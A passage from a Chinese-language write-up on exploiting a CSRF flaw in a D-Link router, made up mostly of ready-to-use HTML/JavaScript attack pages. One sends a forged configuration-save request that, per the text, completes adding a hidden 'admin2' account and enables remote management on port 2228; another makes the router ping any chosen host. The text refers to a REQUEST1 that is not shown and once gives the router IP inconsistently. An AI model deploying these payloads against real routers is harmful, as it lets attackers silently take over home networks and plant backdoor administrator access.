D-link路由器CSRF漏洞利用详解

　　REQUEST2:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST"， "http://192.168.0.1/pigwidgeon.cgi"， true);
xhr.setRequestHeader("Accept"， "text/html，application/xhtml+xml，application/xml;q=0.9，*/*;q=0.8");
xhr.setRequestHeader("Accept-Language"， "en-US，en;q=0.5");
xhr.setRequestHeader("Content-Type"， "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request2" onclick="submitRequest();" />
</form>
</body>
</html>
　　REQUEST1和REQUEST2中，默认的路由局域网IP地址是192.198.0.1，管理帐号是admin，REQUEST1中的request请求中，当密码字段为==OoXxGgYy==的时候，是不会修改admin帐号的密码的。这两个请求完成了管理帐号admin2的添加，同时启用了远程管理端口2228.
　　PART2：ping特定的主机
　　REQUEST3:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST"， "http://192.168.0.1/diagnostic.php"， true);
xhr.setRequestHeader("Accept"， "text/html，application/xhtml+xml，application/xml;q=0.9，*/*;q=0.8");
xhr.setRequestHeader("Accept-Language"， "en-US，en;q=0.5");
xhr.setRequestHeader("Content-Type"， "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "act=ping&dst=X.Y.Z.W";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request3" onclick="submitRequest();" />
</form>
</body>
</html>
　　只需要求该代码中的X.Y.Z.W为你需要ping的主机IP地址可以。